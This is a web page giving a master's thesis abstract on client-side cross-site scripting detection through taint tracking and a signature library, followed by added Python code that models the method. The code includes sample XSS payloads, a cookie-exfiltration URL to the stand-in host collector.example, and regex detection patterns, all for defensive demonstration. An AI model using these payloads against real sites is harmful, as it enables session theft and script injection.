
Research on Detection and Defence Techniques for Cross-Site Scripting Attacks

Published: 2018-10-22 20:49
[Abstract]: With the development of Internet technology, Web applications have become increasingly widespread, and websites and application systems built on the B/S (browser/server) architecture are emerging endlessly. To enhance the user experience, mainstream websites make full use of dynamic scripting languages such as JavaScript. While this technology brings convenience to users, a large number of security vulnerabilities and threats come with it. Among today's Web applications, cross-site scripting (XSS) is one of the most serious and most common threats. The root cause of this attack is a flaw in the Web application's security mechanism: user input is not sufficiently checked and filtered. Although the problem can be fundamentally solved on the server side by fixing the Web application, security patches are slow to arrive and system operators often have weak security awareness, so when a cross-site attack occurs the vulnerability in the Web application still cannot be fixed in time, and users of such applications operate at high risk. Therefore, to improve users' ability to defend themselves actively when under cross-site scripting attack, studying client-side XSS defence measures is particularly important. After analysing and discussing the XSS detection and defence techniques currently in common use, this thesis carries out research in two areas: (1) Building on a thorough understanding of dynamic taint tracking and static taint analysis, it proposes an XSS detection and defence method that relies mainly on dynamic taint tracking, supplemented by static taint analysis. The method first marks the sensitive information in the current page and monitors how that information is transmitted; when an abnormal operation on sensitive information is observed, it issues a danger warning to the user, who decides how to handle it, thereby effectively intercepting the XSS attack. (2) For known, common XSS attack signatures that can be detected directly, it introduces XSS signature detection and proposes a library of known XSS signatures. After static taint analysis of the user's input, suspicious taint sources in the analysis result are compared against the library of known signatures, and taint information found in the library is filtered out directly. Moreover, the results of the taint judgement are used to update the known-signature library continuously. This extended XSS detection and defence technique greatly improves detection speed. For the concrete implementation, the thesis uses the open-source Mozilla Firefox as the experimental platform: by analysing the browser's JavaScript engine, the processing in each of its stages is extended. Experiments verify that the proposed detection and defence method is feasible.
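The two layers the abstract describes, dynamic taint tracking of sensitive page data toward an outbound sink and a known-signature check on statically identified suspicious input sources, are modelled below in Python. This is an added illustration, not the thesis's code: the thesis hooks Mozilla Firefox's JavaScript engine, whereas here a `Tainted` string subclass, an explicit `taint_concat` helper and a `check_sink` function stand in for those engine hooks, and the signature patterns, page origin, cookie value and input strings are all constructed for the example.

```python
"""Toy model of a two-layer client-side XSS defence (illustration, not the thesis's code).

Layer 1: dynamic taint tracking. Sensitive page values (e.g. document.cookie) carry a
         taint label; the label survives string building; an outbound-request sink that
         receives tainted data bound for a foreign host produces a warning for the user.
Layer 2: known-signature library. Suspicious taint sources found by static analysis of
         user input are filtered directly when they match a known pattern, and confirmed
         taint judgements can be fed back into the library.
"""
import re
from urllib.parse import urlsplit


class Tainted(str):
    """A str that remembers which sensitive source(s) it was derived from."""

    def __new__(cls, value, sources):
        obj = super().__new__(cls, value)
        obj.sources = frozenset(sources)
        return obj


def sources_of(value):
    """Taint labels of a value; plain str values carry none."""
    return getattr(value, "sources", frozenset())


def taint_concat(*parts):
    """String building that propagates taint (stands in for the JS engine hook)."""
    sources = frozenset().union(*(sources_of(p) for p in parts))
    joined = "".join(str(p) for p in parts)
    return Tainted(joined, sources) if sources else joined


def check_sink(url, page_origin):
    """Sink monitor for an outbound request URL.

    Returns None when the request is allowed (untainted, or same origin as the page),
    otherwise a warning record that the UI would show so the user can decide.
    """
    sources = sources_of(url)
    if not sources:
        return None
    destination = urlsplit(str(url)).netloc
    if destination == page_origin:
        return None
    return {
        "sink": "outbound_request",
        "destination": destination,
        "leaked_sources": sorted(sources),
    }


# Constructed starting library: patterns for script tags, javascript: URLs and
# inline event-handler attributes. A real library would be far larger.
DEFAULT_SIGNATURES = [r"<\s*script\b", r"javascript\s*:", r"\bon[a-z]+\s*="]


def filter_suspicious_sources(suspicious_sources, signatures):
    """Layer 2: split statically identified suspicious sources into those filtered
    directly by the signature library and those passed on to dynamic tracking."""
    compiled = [re.compile(s, re.IGNORECASE) for s in signatures]
    filtered, passed = [], []
    for src in suspicious_sources:
        (filtered if any(c.search(src) for c in compiled) else passed).append(src)
    return filtered, passed


def learn_signature(signatures, confirmed_payload):
    """Feed a confirmed taint judgement back into the library as an escaped literal."""
    pattern = re.escape(confirmed_payload)
    if pattern not in signatures:
        signatures.append(pattern)
    return signatures


if __name__ == "__main__":
    # Constructed page state: the page origin and a cookie marked as sensitive.
    page_origin = "shop.example"
    cookie = Tainted("sessionid=abc123", ["document.cookie"])

    # Tainted data flowing to a foreign host -> warning for the user.
    print(check_sink(taint_concat("https://collector.example/?c=", cookie), page_origin))
    # Same data to the page's own origin -> allowed (None).
    print(check_sink(taint_concat("https://shop.example/api?c=", cookie), page_origin))

    # Constructed static-analysis output: two suspicious sources, one a known pattern.
    sigs = list(DEFAULT_SIGNATURES)
    print(filter_suspicious_sources(["<script>alert(1)</script>", "plain search term"], sigs))
    # A judgement confirmed by dynamic tracking extends the library.
    learn_signature(sigs, '<script src="//collector.example/x.js">')
    print(len(sigs))
```

The warning record, rather than a hard block, mirrors the abstract's design choice of letting the user decide; the signature layer runs first only because it is cheap, which is where the claimed speed gain comes from.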
[Degree-granting institution]: Lanzhou University of Technology
[Degree level]: Master
[Year degree granted]: 2017
[Classification number]: TP393.08





Link to this article: https://www.wllwen.com/guanlilunwen/ydhl/2288270.html

